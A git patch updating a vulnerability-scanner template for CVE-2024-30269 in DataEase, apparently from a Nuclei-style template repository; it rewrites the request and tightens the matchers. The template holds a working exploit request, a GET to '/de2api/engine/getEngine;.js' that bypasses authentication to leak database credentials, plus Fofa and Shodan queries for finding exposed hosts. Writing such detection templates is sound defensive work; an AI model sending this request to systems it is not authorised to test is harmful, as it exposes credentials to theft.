From 84f8575ac3640ea7de652f04058280e2e0a5ab4b Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 30 Sep 2024 12:55:07 +0400
Subject: [PATCH] Update CVE-2024-30269.yaml

---
 http/cves/2024/CVE-2024-30269.yaml | 11 +++++------
 1 file changed, 5 insertions(+), 6 deletions(-)

diff --git a/http/cves/2024/CVE-2024-30269.yaml b/http/cves/2024/CVE-2024-30269.yaml
index 4632ba1190..09cee0d33a 100644
--- a/http/cves/2024/CVE-2024-30269.yaml
+++ b/http/cves/2024/CVE-2024-30269.yaml
@@ -25,18 +25,17 @@ info:
     product: dataease
     fofa-query: body="dataease"
     shodan-query: http.html:"dataease"
-  tags: cve,cve2024,dataease,info-leak
+  tags: cve,cve2024,dataease,exposure
 
 http:
-  - raw:
-      - |
-        GET /de2api/engine/getEngine;.js HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/de2api/engine/getEngine;.js"
 
     matchers:
       - type: dsl
         dsl:
-          - 'contains_all(body,"username", "password", "port")'
+          - 'contains_all(body, "username", "password", "port", "name\":", "pid\":")'
           - 'contains(content_type,"application/json")'
           - 'status_code == 200'
         condition: and